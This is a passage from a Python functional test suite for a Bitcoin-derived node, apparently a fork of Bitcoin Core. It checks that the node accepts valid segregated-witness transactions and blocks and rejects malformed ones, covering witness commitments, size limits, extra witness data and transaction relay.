self.connect_nodes(0, 2)
self.utxo.pop(0)
self.utxo.append(UTXO(txid, 2, value))
@subtest # type: ignore
def test_getblocktemplate_before_lockin(self):
txid = int(self.nodes[0].sendtoaddress(self.nodes[0].getnewaddress(), 1), 16)
for node in [self.nodes[0], self.nodes[2]]:
gbt_results = node.getblocktemplate({"rules": ["segwit"]})
if node == self.nodes[2]:
# If this is a non-segwit node, we should not get a witness
# commitment.
assert 'default_witness_commitment' not in gbt_results
else:
# For segwit-aware nodes, check the witness
# commitment is correct.
assert 'default_witness_commitment' in gbt_results
witness_commitment = gbt_results['default_witness_commitment']
# Check that default_witness_commitment is present.
witness_root = CBlock.get_merkle_root([ser_uint256(0),
ser_uint256(txid)])
script = get_witness_script(witness_root, 0)
assert_equal(witness_commitment, script.hex())
# Clear out the mempool
self.nodes[0].generate(1)
self.sync_blocks()
@subtest # type: ignore
def test_witness_tx_relay_before_segwit_activation(self):
# Generate a transaction that doesn't require a witness, but send it
# with a witness. Should be rejected for premature-witness, but should
# not be added to recently rejected list.
tx = CTransaction()
tx.vin.append(CTxIn(COutPoint(self.utxo[0].sha256, self.utxo[0].n), b""))
tx.vout.append(CTxOut(self.utxo[0].nValue - 1000, CScript([OP_TRUE, OP_DROP] * 15 + [OP_TRUE])))
tx.wit.vtxinwit.append(CTxInWitness())
tx.wit.vtxinwit[0].scriptWitness.stack = [b'a']
tx.rehash()
tx_hash = tx.sha256
tx_value = tx.vout[0].nValue
# Verify that if a peer doesn't set nServices to include NODE_WITNESS,
# the getdata is just for the non-witness portion.
self.old_node.announce_tx_and_wait_for_getdata(tx)
assert self.old_node.last_message["getdata"].inv[0].type == MSG_TX
# Since we haven't delivered the tx yet, inv'ing the same tx from
# a witness transaction ought not result in a getdata.
self.test_node.announce_tx_and_wait_for_getdata(tx, success=False)
# Delivering this transaction with witness should fail (no matter who
# its from)
assert_equal(len(self.nodes[0].getrawmempool()), 0)
assert_equal(len(self.nodes[1].getrawmempool()), 0)
test_transaction_acceptance(self.nodes[0], self.old_node, tx, with_witness=True, accepted=False)
test_transaction_acceptance(self.nodes[0], self.test_node, tx, with_witness=True, accepted=False)
# But eliminating the witness should fix it
test_transaction_acceptance(self.nodes[0], self.test_node, tx, with_witness=False, accepted=True)
# Cleanup: mine the first transaction and update utxo
self.nodes[0].generate(1)
assert_equal(len(self.nodes[0].getrawmempool()), 0)
self.utxo.pop(0)
self.utxo.append(UTXO(tx_hash, 0, tx_value))
@subtest # type: ignore
def test_standardness_v0(self):
"""Test V0 txout standardness.
V0 segwit outputs and inputs are always standard.
V0 segwit inputs may only be mined after activation, but not before."""
witness_program = CScript([OP_TRUE])
script_pubkey = script_to_p2wsh_script(witness_program)
p2sh_script_pubkey = script_to_p2sh_script(witness_program)
# First prepare a p2sh output (so that spending it will pass standardness)
p2sh_tx = CTransaction()
p2sh_tx.vin = [CTxIn(COutPoint(self.utxo[0].sha256, self.utxo[0].n), b"")]
p2sh_tx.vout = [CTxOut(self.utxo[0].nValue - 1000, p2sh_script_pubkey)]
p2sh_tx.rehash()
# Mine it on test_node to create the confirmed output.
test_transaction_acceptance(self.nodes[0], self.test_node, p2sh_tx, with_witness=True, accepted=True)
self.nodes[0].generate(1)
self.sync_blocks()
# Now test standardness of v0 P2WSH outputs.
# Start by creating a transaction with two outputs.
tx = CTransaction()
tx.vin = [CTxIn(COutPoint(p2sh_tx.sha256, 0), CScript([witness_program]))]
tx.vout = [CTxOut(p2sh_tx.vout[0].nValue - 10000, script_pubkey)]
tx.vout.append(CTxOut(8000, script_pubkey)) # Might burn this later
tx.vin[0].nSequence = BIP125_SEQUENCE_NUMBER # Just to have the option to bump this tx from the mempool
tx.rehash()
# This is always accepted, since the mempool policy is to consider segwit as always active
# and thus allow segwit outputs
test_transaction_acceptance(self.nodes[1], self.std_node, tx, with_witness=True, accepted=True)
# Now create something that looks like a P2PKH output. This won't be spendable.
witness_hash = sha256(witness_program)
script_pubkey = CScript([OP_0, hash160(witness_hash)])
tx2 = CTransaction()
# tx was accepted, so we spend the second output.
tx2.vin = [CTxIn(COutPoint(tx.sha256, 1), b"")]
tx2.vout = [CTxOut(7000, script_pubkey)]
tx2.wit.vtxinwit.append(CTxInWitness())
tx2.wit.vtxinwit[0].scriptWitness.stack = [witness_program]
tx2.rehash()
test_transaction_acceptance(self.nodes[1], self.std_node, tx2, with_witness=True, accepted=True)
# Now update self.utxo for later tests.
tx3 = CTransaction()
# tx and tx2 were both accepted. Don't bother trying to reclaim the
# P2PKH output; just send tx's first output back to an anyone-can-spend.
self.sync_mempools([self.nodes[0], self.nodes[1]])
tx3.vin = [CTxIn(COutPoint(tx.sha256, 0), b"")]
tx3.vout = [CTxOut(tx.vout[0].nValue - 1000, CScript([OP_TRUE, OP_DROP] * 15 + [OP_TRUE]))]
tx3.wit.vtxinwit.append(CTxInWitness())
tx3.wit.vtxinwit[0].scriptWitness.stack = [witness_program]
tx3.rehash()
if not self.segwit_active:
# Just check mempool acceptance, but don't add the transaction to the mempool, since witness is disallowed
# in blocks and the tx is impossible to mine right now.
assert_equal(
self.nodes[0].testmempoolaccept([tx3.serialize_with_witness().hex()]),
[{
'txid': tx3.hash,
'wtxid': tx3.getwtxid(),
'allowed': True,
'vsize': tx3.get_vsize(),
'fees': {
'base': Decimal('0.00001000'),
},
}],
)
# Create the same output as tx3, but by replacing tx
tx3_out = tx3.vout[0]
tx3 = tx
tx3.vout = [tx3_out]
tx3.rehash()
assert_equal(
self.nodes[0].testmempoolaccept([tx3.serialize_with_witness().hex()]),
[{
'txid': tx3.hash,
'wtxid': tx3.getwtxid(),
'allowed': True,
'vsize': tx3.get_vsize(),
'fees': {
'base': Decimal('0.00011000'),
},
}],
)
test_transaction_acceptance(self.nodes[0], self.test_node, tx3, with_witness=True, accepted=True)
self.nodes[0].generate(1)
self.sync_blocks()
self.utxo.pop(0)
self.utxo.append(UTXO(tx3.sha256, 0, tx3.vout[0].nValue))
assert_equal(len(self.nodes[1].getrawmempool()), 0)
@subtest # type: ignore
def advance_to_segwit_active(self):
"""Mine enough blocks to activate segwit."""
assert not softfork_active(self.nodes[0], 'segwit')
height = self.nodes[0].getblockcount()
self.nodes[0].generate(SEGWIT_HEIGHT - height - 2)
assert not softfork_active(self.nodes[0], 'segwit')
self.nodes[0].generate(1)
assert softfork_active(self.nodes[0], 'segwit')
self.segwit_active = True
@subtest # type: ignore
def test_p2sh_witness(self):
"""Test P2SH wrapped witness programs."""
# Prepare the p2sh-wrapped witness output
witness_program = CScript([OP_DROP, OP_TRUE])
p2wsh_pubkey = script_to_p2wsh_script(witness_program)
script_pubkey = script_to_p2sh_script(p2wsh_pubkey)
script_sig = CScript([p2wsh_pubkey]) # a push of the redeem script
# Fund the P2SH output
tx = CTransaction()
tx.vin.append(CTxIn(COutPoint(self.utxo[0].sha256, self.utxo[0].n), b""))
tx.vout.append(CTxOut(self.utxo[0].nValue - 1000, script_pubkey))
tx.rehash()
# Verify mempool acceptance and block validity
test_transaction_acceptance(self.nodes[0], self.test_node, tx, with_witness=False, accepted=True)
block = self.build_next_block()
self.update_witness_block_with_transactions(block, [tx])
test_witness_block(self.nodes[0], self.test_node, block, accepted=True, with_witness=True)
self.sync_blocks()
# Now test attempts to spend the output.
spend_tx = CTransaction()
spend_tx.vin.append(CTxIn(COutPoint(tx.sha256, 0), script_sig))
spend_tx.vout.append(CTxOut(tx.vout[0].nValue - 1000, CScript([OP_TRUE])))
spend_tx.rehash()
# This transaction should not be accepted into the mempool pre- or
# post-segwit. Mempool acceptance will use SCRIPT_VERIFY_WITNESS which
# will require a witness to spend a witness program regardless of
# segwit activation. Note that older ocvcoind's that are not
# segwit-aware would also reject this for failing CLEANSTACK.
with self.nodes[0].assert_debug_log(
expected_msgs=(spend_tx.hash, 'was not accepted: non-mandatory-script-verify-flag (Witness program was passed an empty witness)')):
test_transaction_acceptance(self.nodes[0], self.test_node, spend_tx, with_witness=False, accepted=False)
# Try to put the witness script in the scriptSig, should also fail.
spend_tx.vin[0].scriptSig = CScript([p2wsh_pubkey, b'a'])
spend_tx.rehash()
with self.nodes[0].assert_debug_log(
expected_msgs=(spend_tx.hash, 'was not accepted: mandatory-script-verify-flag-failed (Script evaluated without error but finished with a false/empty top stack element)')):
test_transaction_acceptance(self.nodes[0], self.test_node, spend_tx, with_witness=False, accepted=False)
# Now put the witness script in the witness, should succeed after
# segwit activates.
spend_tx.vin[0].scriptSig = script_sig
spend_tx.rehash()
spend_tx.wit.vtxinwit.append(CTxInWitness())
spend_tx.wit.vtxinwit[0].scriptWitness.stack = [b'a', witness_program]
# Verify mempool acceptance
test_transaction_acceptance(self.nodes[0], self.test_node, spend_tx, with_witness=True, accepted=True)
block = self.build_next_block()
self.update_witness_block_with_transactions(block, [spend_tx])
# If we're after activation, then sending this with witnesses should be valid.
# This no longer works before activation, because SCRIPT_VERIFY_WITNESS
# is always set.
# TODO: rewrite this test to make clear that it only works after activation.
test_witness_block(self.nodes[0], self.test_node, block, accepted=True)
# Update self.utxo
self.utxo.pop(0)
self.utxo.append(UTXO(spend_tx.sha256, 0, spend_tx.vout[0].nValue))
@subtest # type: ignore
def test_witness_commitments(self):
"""Test witness commitments.
This test can only be run after segwit has activated."""
# First try a correct witness commitment.
block = self.build_next_block()
add_witness_commitment(block)
block.solve()
# Test the test -- witness serialization should be different
assert msg_block(block).serialize() != msg_no_witness_block(block).serialize()
# This empty block should be valid.
test_witness_block(self.nodes[0], self.test_node, block, accepted=True)
# Try to tweak the nonce
block_2 = self.build_next_block()
add_witness_commitment(block_2, nonce=28)
block_2.solve()
# The commitment should have changed!
assert block_2.vtx[0].vout[-1] != block.vtx[0].vout[-1]
# This should also be valid.
test_witness_block(self.nodes[0], self.test_node, block_2, accepted=True)
# Now test commitments with actual transactions
tx = CTransaction()
tx.vin.append(CTxIn(COutPoint(self.utxo[0].sha256, self.utxo[0].n), b""))
# Let's construct a witness program
witness_program = CScript([OP_TRUE])
script_pubkey = script_to_p2wsh_script(witness_program)
tx.vout.append(CTxOut(self.utxo[0].nValue - 1000, script_pubkey))
tx.rehash()
# tx2 will spend tx1, and send back to a regular anyone-can-spend address
tx2 = CTransaction()
tx2.vin.append(CTxIn(COutPoint(tx.sha256, 0), b""))
tx2.vout.append(CTxOut(tx.vout[0].nValue - 1000, witness_program))
tx2.wit.vtxinwit.append(CTxInWitness())
tx2.wit.vtxinwit[0].scriptWitness.stack = [witness_program]
tx2.rehash()
block_3 = self.build_next_block()
self.update_witness_block_with_transactions(block_3, [tx, tx2], nonce=1)
# Add an extra OP_RETURN output that matches the witness commitment template,
# even though it has extra data after the incorrect commitment.
# This block should fail.
block_3.vtx[0].vout.append(CTxOut(0, CScript([OP_RETURN, WITNESS_COMMITMENT_HEADER + ser_uint256(2), 10])))
block_3.vtx[0].rehash()
block_3.hashMerkleRoot = block_3.calc_merkle_root()
block_3.rehash()
block_3.solve()
test_witness_block(self.nodes[0], self.test_node, block_3, accepted=False)
# Add a different commitment with different nonce, but in the
# right location, and with some funds burned(!).
# This should succeed (nValue shouldn't affect finding the
# witness commitment).
add_witness_commitment(block_3, nonce=0)
block_3.vtx[0].vout[0].nValue -= 1
block_3.vtx[0].vout[-1].nValue += 1
block_3.vtx[0].rehash()
block_3.hashMerkleRoot = block_3.calc_merkle_root()
block_3.rehash()
assert len(block_3.vtx[0].vout) == 4 # 3 OP_returns
block_3.solve()
test_witness_block(self.nodes[0], self.test_node, block_3, accepted=True)
# Finally test that a block with no witness transactions can
# omit the commitment.
block_4 = self.build_next_block()
tx3 = CTransaction()
tx3.vin.append(CTxIn(COutPoint(tx2.sha256, 0), b""))
tx3.vout.append(CTxOut(tx.vout[0].nValue - 1000, witness_program))
tx3.rehash()
block_4.vtx.append(tx3)
block_4.hashMerkleRoot = block_4.calc_merkle_root()
block_4.solve()
test_witness_block(self.nodes[0], self.test_node, block_4, with_witness=False, accepted=True)
# Update available utxo's for use in later test.
self.utxo.pop(0)
self.utxo.append(UTXO(tx3.sha256, 0, tx3.vout[0].nValue))
@subtest # type: ignore
def test_block_malleability(self):
# Make sure that a block that has too big a virtual size
# because of a too-large coinbase witness is not permanently
# marked bad.
block = self.build_next_block()
add_witness_commitment(block)
block.solve()
block.vtx[0].wit.vtxinwit[0].scriptWitness.stack.append(b'a' * 5000000)
assert get_virtual_size(block) > MAX_BLOCK_BASE_SIZE
# We can't send over the p2p network, because this is too big to relay
# TODO: repeat this test with a block that can be relayed
assert_equal('bad-witness-nonce-size', self.nodes[0].submitblock(block.serialize().hex()))
assert self.nodes[0].getbestblockhash() != block.hash
block.vtx[0].wit.vtxinwit[0].scriptWitness.stack.pop()
assert get_virtual_size(block) < MAX_BLOCK_BASE_SIZE
assert_equal(None, self.nodes[0].submitblock(block.serialize().hex()))
assert self.nodes[0].getbestblockhash() == block.hash
# Now make sure that malleating the witness reserved value doesn't
# result in a block permanently marked bad.
block = self.build_next_block()
add_witness_commitment(block)
block.solve()
# Change the nonce -- should not cause the block to be permanently
# failed
block.vtx[0].wit.vtxinwit[0].scriptWitness.stack = [ser_uint256(1)]
test_witness_block(self.nodes[0], self.test_node, block, accepted=False)
# Changing the witness reserved value doesn't change the block hash
block.vtx[0].wit.vtxinwit[0].scriptWitness.stack = [ser_uint256(0)]
test_witness_block(self.nodes[0], self.test_node, block, accepted=True)
@subtest # type: ignore
def test_witness_block_size(self):
# TODO: Test that non-witness carrying blocks can't exceed 1MB
# Skipping this test for now; this is covered in p2p-fullblocktest.py
# Test that witness-bearing blocks are limited at ceil(base + wit/4) <= 1MB.
block = self.build_next_block()
assert len(self.utxo) > 0
# Create a P2WSH transaction.
# The witness program will be a bunch of OP_2DROP's, followed by OP_TRUE.
# This should give us plenty of room to tweak the spending tx's
# virtual size.
NUM_DROPS = 200 # 201 max ops per script!
NUM_OUTPUTS = 50
witness_program = CScript([OP_2DROP] * NUM_DROPS + [OP_TRUE])
script_pubkey = script_to_p2wsh_script(witness_program)
prevout = COutPoint(self.utxo[0].sha256, self.utxo[0].n)
value = self.utxo[0].nValue
parent_tx = CTransaction()
parent_tx.vin.append(CTxIn(prevout, b""))
child_value = int(value / NUM_OUTPUTS)
for _ in range(NUM_OUTPUTS):
parent_tx.vout.append(CTxOut(child_value, script_pubkey))
parent_tx.vout[0].nValue -= 50000
assert parent_tx.vout[0].nValue > 0
parent_tx.rehash()
child_tx = CTransaction()
for i in range(NUM_OUTPUTS):
child_tx.vin.append(CTxIn(COutPoint(parent_tx.sha256, i), b""))
child_tx.vout = [CTxOut(value - 100000, CScript([OP_TRUE]))]
for _ in range(NUM_OUTPUTS):
child_tx.wit.vtxinwit.append(CTxInWitness())
child_tx.wit.vtxinwit[-1].scriptWitness.stack = [b'a' * 195] * (2 * NUM_DROPS) + [witness_program]
child_tx.rehash()
self.update_witness_block_with_transactions(block, [parent_tx, child_tx])
vsize = get_virtual_size(block)
additional_bytes = (MAX_BLOCK_BASE_SIZE - vsize) * 4
i = 0
while additional_bytes > 0:
# Add some more bytes to each input until we hit MAX_BLOCK_BASE_SIZE+1
extra_bytes = min(additional_bytes + 1, 55)
block.vtx[-1].wit.vtxinwit[int(i / (2 * NUM_DROPS))].scriptWitness.stack[i % (2 * NUM_DROPS)] = b'a' * (195 + extra_bytes)
additional_bytes -= extra_bytes
i += 1
block.vtx[0].vout.pop() # Remove old commitment
add_witness_commitment(block)
block.solve()
vsize = get_virtual_size(block)
assert_equal(vsize, MAX_BLOCK_BASE_SIZE + 1)
# Make sure that our test case would exceed the old max-network-message
# limit
assert len(block.serialize()) > 2 * 1024 * 1024
test_witness_block(self.nodes[0], self.test_node, block, accepted=False)
# Now resize the second transaction to make the block fit.
cur_length = len(block.vtx[-1].wit.vtxinwit[0].scriptWitness.stack[0])
block.vtx[-1].wit.vtxinwit[0].scriptWitness.stack[0] = b'a' * (cur_length - 1)
block.vtx[0].vout.pop()
add_witness_commitment(block)
block.solve()
assert get_virtual_size(block) == MAX_BLOCK_BASE_SIZE
test_witness_block(self.nodes[0], self.test_node, block, accepted=True)
# Update available utxo's
self.utxo.pop(0)
self.utxo.append(UTXO(block.vtx[-1].sha256, 0, block.vtx[-1].vout[0].nValue))
@subtest # type: ignore
def test_submit_block(self):
"""Test that submitblock adds the nonce automatically when possible."""
block = self.build_next_block()
# Try using a custom nonce and then don't supply it.
# This shouldn't possibly work.
add_witness_commitment(block, nonce=1)
block.vtx[0].wit = CTxWitness() # drop the nonce
block.solve()
assert_equal('bad-witness-merkle-match', self.nodes[0].submitblock(block.serialize().hex()))
assert self.nodes[0].getbestblockhash() != block.hash
# Now redo commitment with the standard nonce, but let ocvcoind fill it in.
add_witness_commitment(block, nonce=0)
block.vtx[0].wit = CTxWitness()
block.solve()
assert_equal(None, self.nodes[0].submitblock(block.serialize().hex()))
assert_equal(self.nodes[0].getbestblockhash(), block.hash)
# This time, add a tx with non-empty witness, but don't supply
# the commitment.
block_2 = self.build_next_block()
add_witness_commitment(block_2)
block_2.solve()
# Drop commitment and nonce -- submitblock should not fill in.
block_2.vtx[0].vout.pop()
block_2.vtx[0].wit = CTxWitness()
assert_equal('bad-txnmrklroot', self.nodes[0].submitblock(block_2.serialize().hex()))
# Tip should not advance!
assert self.nodes[0].getbestblockhash() != block_2.hash
@subtest # type: ignore
def test_extra_witness_data(self):
"""Test extra witness data in a transaction."""
block = self.build_next_block()
witness_program = CScript([OP_DROP, OP_TRUE])
script_pubkey = script_to_p2wsh_script(witness_program)
# First try extra witness data on a tx that doesn't require a witness
tx = CTransaction()
tx.vin.append(CTxIn(COutPoint(self.utxo[0].sha256, self.utxo[0].n), b""))
tx.vout.append(CTxOut(self.utxo[0].nValue - 2000, script_pubkey))
tx.vout.append(CTxOut(1000, CScript([OP_TRUE]))) # non-witness output
tx.wit.vtxinwit.append(CTxInWitness())
tx.wit.vtxinwit[0].scriptWitness.stack = [CScript([])]
tx.rehash()
self.update_witness_block_with_transactions(block, [tx])
# Extra witness data should not be allowed.
test_witness_block(self.nodes[0], self.test_node, block, accepted=False)
# Try extra signature data. Ok if we're not spending a witness output.
block.vtx[1].wit.vtxinwit = []
block.vtx[1].vin[0].scriptSig = CScript([OP_0])
block.vtx[1].rehash()
add_witness_commitment(block)
block.solve()
test_witness_block(self.nodes[0], self.test_node, block, accepted=True)
# Now try extra witness/signature data on an input that DOES require a
# witness
tx2 = CTransaction()
tx2.vin.append(CTxIn(COutPoint(tx.sha256, 0), b"")) # witness output
tx2.vin.append(CTxIn(COutPoint(tx.sha256, 1), b"")) # non-witness
tx2.vout.append(CTxOut(tx.vout[0].nValue, CScript([OP_TRUE])))
tx2.wit.vtxinwit.extend([CTxInWitness(), CTxInWitness()])
tx2.wit.vtxinwit[0].scriptWitness.stack = [CScript([CScriptNum(1)]), CScript([CScriptNum(1)]), witness_program]
tx2.wit.vtxinwit[1].scriptWitness.stack = [CScript([OP_TRUE])]
block = self.build_next_block()
self.update_witness_block_with_transactions(block, [tx2])
# This has extra witness data, so it should fail.
test_witness_block(self.nodes[0], self.test_node, block, accepted=False)
# Now get rid of the extra witness, but add extra scriptSig data
tx2.vin[0].scriptSig = CScript([OP_TRUE])
tx2.vin[1].scriptSig = CScript([OP_TRUE])
tx2.wit.vtxinwit[0].scriptWitness.stack.pop(0)
tx2.wit.vtxinwit[1].scriptWitness.stack = []
tx2.rehash()
add_witness_commitment(block)
block.solve()
# This has extra signature data for a witness input, so it should fail.
test_witness_block(self.nodes[0], self.test_node, block, accepted=False)
# Now get rid of the extra scriptsig on the witness input, and verify
# success (even with extra scriptsig data in the non-witness input)
tx2.vin[0].scriptSig = b""
tx2.rehash()
add_witness_commitment(block)
block.solve()
test_witness_block(self.nodes[0], self.test_node, block, accepted=True)
# Update utxo for later tests
self.utxo.pop(0)
self.utxo.append(UTXO(tx2.sha256, 0, tx2.vout[0].nValue))
@subtest # type: ignore
def test_max_witness_push_length(self):
"""Test that witness stack can only allow up to 520 byte pushes."""
block = self.build_next_block()
witness_program = CScript([OP_DROP, OP_TRUE])
script_pubkey = script_to_p2wsh_script(witness_program)
tx = CTransaction()
tx.vin.append(CTxIn(COutPoint(self.utxo[0].sha256, self.utxo[0].n), b""))
tx.vout.append(CTxOut(self.utxo[0].nValue - 1000, script_pubkey))
tx.rehash()
tx2 = CTransaction()
tx2.vin.append(CTxIn(COutPoint(tx.sha256, 0), b""))
tx2.vout.append(CTxOut(tx.vout[0].nValue - 1000, CScript([OP_TRUE])))
tx2.wit.vtxinwit.append(CTxInWitness())
# First try a 521-byte stack element
tx2.wit.vtxinwit[0].scriptWitness.stack = [b'a' * (MAX_SCRIPT_ELEMENT_SIZE + 1), witness_program]
tx2.rehash()
self.update_witness_block_with_transactions(block, [tx, tx2])
test_witness_block(self.nodes[0], self.test_node, block, accepted=False)
# Now reduce the length of the stack element
tx2.wit.vtxinwit[0].scriptWitness.stack[0] = b'a' * (MAX_SCRIPT_ELEMENT_SIZE)
add_witness_commitment(block)
block.solve()
test_witness_block(self.nodes[0], self.test_node, block, accepted=True)
# Update the utxo for later tests
self.utxo.pop()
self.utxo.append(UTXO(tx2.sha256, 0, tx2.vout[0].nValue))
@subtest # type: ignore
def test_max_witness_program_length(self):
"""Test that witness outputs greater than 10kB can't be spent."""
MAX_PROGRAM_LENGTH = 10000
# This program is 19 max pushes (9937 bytes), then 64 more opcode-bytes.
long_witness_program = CScript([b'a' * MAX_SCRIPT_ELEMENT_SIZE] * 19 + [OP_DROP] * 63 + [OP_TRUE])
assert len(long_witness_program) == MAX_PROGRAM_LENGTH + 1
long_script_pubkey = script_to_p2wsh_script(long_witness_program)
block = self.build_next_block()
tx = CTransaction()
tx.vin.append(CTxIn(COutPoint(self.utxo[0].sha256, self.utxo[0].n), b""))
tx.vout.append(CTxOut(self.utxo[0].nValue - 1000, long_script_pubkey))
tx.rehash()
tx2 = CTransaction()
tx2.vin.append(CTxIn(COutPoint(tx.sha256, 0), b""))
tx2.vout.append(CTxOut(tx.vout[0].nValue - 1000, CScript([OP_TRUE])))
tx2.wit.vtxinwit.append(CTxInWitness())
tx2.wit.vtxinwit[0].scriptWitness.stack = [b'a'] * 44 + [long_witness_program]
tx2.rehash()
self.update_witness_block_with_transactions(block, [tx, tx2])
test_witness_block(self.nodes[0], self.test_node, block, accepted=False)
# Try again with one less byte in the witness program
witness_program = CScript([b'a' * MAX_SCRIPT_ELEMENT_SIZE] * 19 + [OP_DROP] * 62 + [OP_TRUE])
assert len(witness_program) == MAX_PROGRAM_LENGTH
script_pubkey = script_to_p2wsh_script(witness_program)
tx.vout[0] = CTxOut(tx.vout[0].nValue, script_pubkey)
tx.rehash()
tx2.vin[0].prevout.hash = tx.sha256
tx2.wit.vtxinwit[0].scriptWitness.stack = [b'a'] * 43 + [witness_program]
tx2.rehash()
block.vtx = [block.vtx[0]]
self.update_witness_block_with_transactions(block, [tx, tx2])
test_witness_block(self.nodes[0], self.test_node, block, accepted=True)
self.utxo.pop()
self.utxo.append(UTXO(tx2.sha256, 0, tx2.vout[0].nValue))
@subtest # type: ignore
def test_witness_input_length(self):
"""Test that vin length must match vtxinwit length."""
witness_program = CScript([OP_DROP, OP_TRUE])
script_pubkey = script_to_p2wsh_script(witness_program)
# Create a transaction that splits our utxo into many outputs
tx = CTransaction()
tx.vin.append(CTxIn(COutPoint(self.utxo[0].sha256, self.utxo[0].n), b""))
value = self.utxo[0].nValue
for _ in range(10):
tx.vout.append(CTxOut(int(value / 10), script_pubkey))
tx.vout[0].nValue -= 1000
assert tx.vout[0].nValue >= 0
block = self.build_next_block()
self.update_witness_block_with_transactions(block, [tx])
test_witness_block(self.nodes[0], self.test_node, block, accepted=True)
# Try various ways to spend tx that should all break.
# This "broken" transaction serializer will not normalize
# the length of vtxinwit.
class BrokenCTransaction(CTransaction):
def serialize_with_witness(self):
flags = 0
if not self.wit.is_null():
flags |= 1
r = b""
r += struct.pack("<i", self.nVersion)
if flags:
dummy = []
r += ser_vector(dummy)
r += struct.pack("<B", flags)
r += ser_vector(self.vin)
r += ser_vector(self.vout)
if flags & 1:
r += self.wit.serialize()
r += struct.pack("<I", self.nLockTime)
return r
tx2 = BrokenCTransaction()
for i in range(10):
tx2.vin.append(CTxIn(COutPoint(tx.sha256, i), b""))
tx2.vout.append(CTxOut(value - 3000, CScript([OP_TRUE])))
# First try using a too long vtxinwit
for i in range(11):
tx2.wit.vtxinwit.append(CTxInWitness())
tx2.wit.vtxinwit[i].scriptWitness.stack = [b'a', witness_program]
block = self.build_next_block()
self.update_witness_block_with_transactions(block, [tx2])
test_witness_block(self.nodes[0], self.test_node, block, accepted=False)
# Now try using a too short vtxinwit
tx2.wit.vtxinwit.pop()
tx2.wit.vtxinwit.pop()
block.vtx = [block.vtx[0]]
self.update_witness_block_with_transactions(block, [tx2])
test_witness_block(self.nodes[0], self.test_node, block, accepted=False)
# Now make one of the intermediate witnesses be incorrect
tx2.wit.vtxinwit.append(CTxInWitness())
tx2.wit.vtxinwit[-1].scriptWitness.stack = [b'a', witness_program]
tx2.wit.vtxinwit[5].scriptWitness.stack = [witness_program]
block.vtx = [block.vtx[0]]
self.update_witness_block_with_transactions(block, [tx2])
test_witness_block(self.nodes[0], self.test_node, block, accepted=False)
# Fix the broken witness and the block should be accepted.
tx2.wit.vtxinwit[5].scriptWitness.stack = [b'a', witness_program]
block.vtx = [block.vtx[0]]
self.update_witness_block_with_transactions(block, [tx2])
test_witness_block(self.nodes[0], self.test_node, block, accepted=True)
self.utxo.pop()
self.utxo.append(UTXO(tx2.sha256, 0, tx2.vout[0].nValue))
@subtest # type: ignore
def test_tx_relay_after_segwit_activation(self):
"""Test transaction relay after segwit activation.
After segwit activates, verify that mempool:
- rejects transactions with unnecessary/extra witnesses
- accepts transactions with valid witnesses
and that witness transactions are relayed to non-upgraded peers."""
# Generate a transaction that doesn't require a witness, but send it
# with a witness. Should be rejected because we can't use a witness
# when spending a non-witness output.
tx = CTransaction()
tx.vin.append(CTxIn(COutPoint(self.utxo[0].sha256, self.utxo[0].n), b""))
tx.vout.append(CTxOut(self.utxo[0].nValue - 1000, CScript([OP_TRUE, OP_DROP] * 15 + [OP_TRUE])))
tx.wit.vtxinwit.append(CTxInWitness())
tx.wit.vtxinwit[0].scriptWitness.stack = [b'a']
tx.rehash()
tx_hash = tx.sha256
# Verify that unnecessary witnesses are rejected.
self.test_node.announce_tx_and_wait_for_getdata(tx)
assert_equal(len(self.nodes[0].getrawmempool()), 0)
test_transaction_acceptance(self.nodes[0], self.test_node, tx, with_witness=True, accepted=False)
# Verify that removing the witness succeeds.
test_transaction_acceptance(self.nodes[0], self.test_node, tx, with_witness=False, accepted=True)
# Now try to add extra witness data to a valid witness tx.
witness_program = CScript([OP_TRUE])
script_pubkey = script_to_p2wsh_script(witness_program)
tx2 = CTransaction()
tx2.vin.append(CTxIn(COutPoint(tx_hash, 0), b""))
tx2.vout.append(CTxOut(tx.vout[0].nValue - 1000, script_pubkey))
tx2.rehash()
tx3 = CTransaction()
tx3.vin.append(CTxIn(COutPoint(tx2.sha256, 0), b""))
tx3.wit.vtxinwit.append(CTxInWitness())
# Add too-large for IsStandard witness and check that it does not enter reject filter
p2sh_program = CScript([OP_TRUE])
witness_program2 = CScript([b'a' * 400000])
tx3.vout.append(CTxOut(tx2.vout[0].nValue - 1000, script_to_p2sh_script(p2sh_program)))
tx3.wit.vtxinwit[0].scriptWitness.stack = [witness_program2]
tx3.rehash()
# Node will not be blinded to the transaction, requesting it any number of times
# if it is being announced via txid relay.
# Node will be blinded to the transaction via wtxid, however.
self.std_node.announce_tx_and_wait_for_getdata(tx3)
self.std_wtx_node.announce_tx_and_wait_for_getdata(tx3, use_wtxid=True)
test_transaction_acceptance(self.nodes[1], self.std_node, tx3, True, False, 'tx-size')
self.std_node.announce_tx_and_wait_for_getdata(tx3)
self.std_wtx_node.announce_tx_and_wait_for_getdata(tx3, use_wtxid=True, success=False)
# Remove witness stuffing, instead add extra witness push on stack
tx3.vout[0] = CTxOut(tx2.vout[0].nValue - 1000, CScript([OP_TRUE, OP_DROP] * 15 + [OP_TRUE]))
tx3.wit.vtxinwit[0].scriptWitness.stack = [CScript([CScriptNum(1)]), witness_program]
tx3.rehash()
test_transaction_acceptance(self.nodes[0], self.test_node, tx2, with_witness=True, accepted=True)
test_transaction_acceptance(self.nodes[0], self.test_node, tx3, with_witness=True, accepted=False)
# Get rid of the extra witness, and verify acceptance.
tx3.wit.vtxinwit[0].scriptWitness.stack = [witness_program]
# Also check that old_node gets a tx announcement, even though this is
# a witness transaction.
self.old_node.wait_for_inv([CInv(MSG_TX, tx2.sha256)]) # wait until tx2 was inv'ed
test_transaction_acceptance(self.nodes[0], self.test_node, tx3, with_witness=True, accepted=True)
self.old_node.wait_for_inv([CInv(MSG_TX, tx3.sha256)])
# Test that getrawtransaction returns correct witness information
# hash, size, vsize
raw_tx = self.nodes[0].getrawtransaction(tx3.hash, 1)
assert_equal(int(raw_tx["hash"], 16), tx3.calc_sha256(True))
assert_equal(raw_tx["size"], len(tx3.serialize_with_witness()))
weight = len(tx3.serialize_with_witness()) + 3 * len(tx3.serialize_without_witness())
vsize = math.ceil(weight / 4)
assert_equal(raw_tx["vsize"], vsize)
assert_equal(raw_tx["weight"], weight)
assert_equal(len(raw_tx["vin"][0]["txinwitness"]), 1)
assert_equal(raw_tx["vin"][0]["txinwitness"][0], witness_program.hex())
assert vsize != raw_tx["size"]
# Cleanup: mine the transactions and update utxo for next test
self.nodes[0].generate(1)
assert_equal(len(self.nodes[0].getrawmempool()), 0)
self.utxo.pop(0)
self.utxo.append(UTXO(tx3.sha256, 0, tx3.vout[0].nValue))
@subtest # type: ignore
def test_segwit_versions(self):
